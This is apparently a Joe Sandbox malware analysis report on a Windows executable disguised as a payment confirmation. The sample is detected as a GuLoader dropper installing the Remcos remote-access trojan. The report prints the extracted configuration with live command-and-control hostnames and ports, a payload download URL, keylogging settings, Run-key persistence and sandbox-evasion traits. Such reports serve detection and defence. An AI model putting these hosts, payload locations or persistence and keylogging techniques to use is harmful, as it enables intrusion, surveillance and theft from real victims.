Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Overview

General Information

Sample name:inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
Analysis ID:1590830
MD5:25eec63edf7c0eb8628a89712b5cb363
SHA1:4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
Tags:exeRemcosuser-threatcat_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Opens the same file many times (likely Sandbox evasion)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.3536097614.0000000006D99000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888JoeSecurity_RemcosYara detected Remcos RATJoe Security

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, ProcessId: 5888, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T16:35:30.624887+010028032702Potentially Bad Traffic192.168.2.549977109.99.162.14443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batReversingLabs: Detection: 26%
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeVirustotal: Detection: 34%Perma Link
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeReversingLabs: Detection: 26%
              Source: Yara matchFile source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49977 version: TLS 1.2
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: mshtml.pdbUGP source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910

              Networking

              barindex
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealthy.zapto.org
              Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49977 -> 109.99.162.14:443
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: teldrum.ro
              Source: global trafficDNS traffic detected: DNS query: linktreewealth.zapto.org
              Source: global trafficDNS traffic detected: DNS query: linktreewealthy.zapto.org
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Rockerfest.bat.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4629681766.0000000035F30000.00000004.00001000.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin7
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin;
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4629681766.0000000035F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49977 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_6E311BFF0_2_6E311BFF
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@20/1
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile created: C:\Users\user\eftermodnendesJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsk12E4.tmpJump to behavior
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeVirustotal: Detection: 34%
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile read: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: mshtml.pdbUGP source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.3536097614.0000000006D99000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_6E311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E311BFF
